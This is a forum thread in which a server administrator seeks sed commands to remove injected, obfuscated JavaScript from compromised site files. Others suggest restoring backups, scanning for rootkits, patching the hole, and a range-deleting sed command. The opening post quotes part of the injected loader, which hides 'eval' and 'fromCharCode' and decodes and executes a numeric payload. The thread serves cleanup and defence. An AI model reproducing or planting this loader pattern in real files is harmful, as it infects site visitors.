Removing obfuscated javascript from js files

cuantica · July 2, 2012, 11:33am

ello, I am trying to remove obfuscated code in multiple files on a server, the malicious code is surronded by

/*km0ae9gr6m*//*qhk6sa6g1c*/

I had success removing from some files using this command

sed -i ':strt;s|/\*km0ae9gr6m\*/[^/]*/\*qhk6sa6g1c\*/||g;/\/\*km0ae9gr6m\*\//{N;b strt}' fileaffected.js

But it failed on this pattern

/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[312,420,100,200,303,440,34,118,96,40,32
...
more bytecode
...
,68,312,420,100,200,303,440,34,118,96,40,32,64,96,128,32,64,96,128,32,64,96,128,100,222,297,468,109,202,330,464,46,196,333,400,121,92,291,448,112,202,330,400,67,208,315,432,100,80,315,408,114,218,123,236,10,64,96,128,32,64,96,128,32,250,30,128,32,64,96,500,99,194,348,396,104,80,303,164,123,250,30,500,44,64,159,192,48,82,177];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/

Any suggestions?

jim_mcnamara · July 2, 2012, 11:50am

This is not the answer you wanted: But have you considered restoring the files from backup?

You also probably need to run something like rootkit hunter on your system. Otherwise the clean code will be messed up again no time. And you did patch or plug the hole the exploit used to attack your system?

alister · July 2, 2012, 11:51am

Welcome to the forums, cuantica:

Someone had a similar problem very recently. This post may be of use to you: How to remove the last 3 lines from many files? Post: 302662831

Regards,
Alister

cuantica · July 2, 2012, 12:31pm

Thanks Jim, backups are not an option. This issue happened due to a unpatched Plesk box so i decide to move sites to cpanel.

Regarding the thread suggested by Allister I have checked it before posting, and decided to open a new thread as the person trying to fix this was considering 3 lines and in some files the infection uses only one line and using that approach would modify the valid file contents. BTW this seems to be related to my box too, but posted by the person we had delegated administration

It is safer to remove them using the pattern, it worked fine but I don't know how to escape the scripting at beginning and end of the pattern to just consider

/*km0ae9gr6m*/malware/*qhk6sa6g1c*/

---------- Post updated at 11:31 AM ---------- Previous update was at 11:02 AM ----------

Any suggestions ?

methyl · July 2, 2012, 2:33pm

I'm no sed expert, but have you tried something like this:

sed -n '/\/\*km0ae9gr6m\*\//,/\/\*qhk6sa6g1c\*\//!p' filename

This is essentially

sed -n '/start/,/end/!p'

i.e. Output anything except the lines in the range (inclusive).

The proposed sed escapes every character in the search strings which is special to sed (i.e. / and * ).

Tested on your sample data.

Habitual · July 2, 2012, 8:38pm

same disscussion over at How to remove the last 3 lines from many files?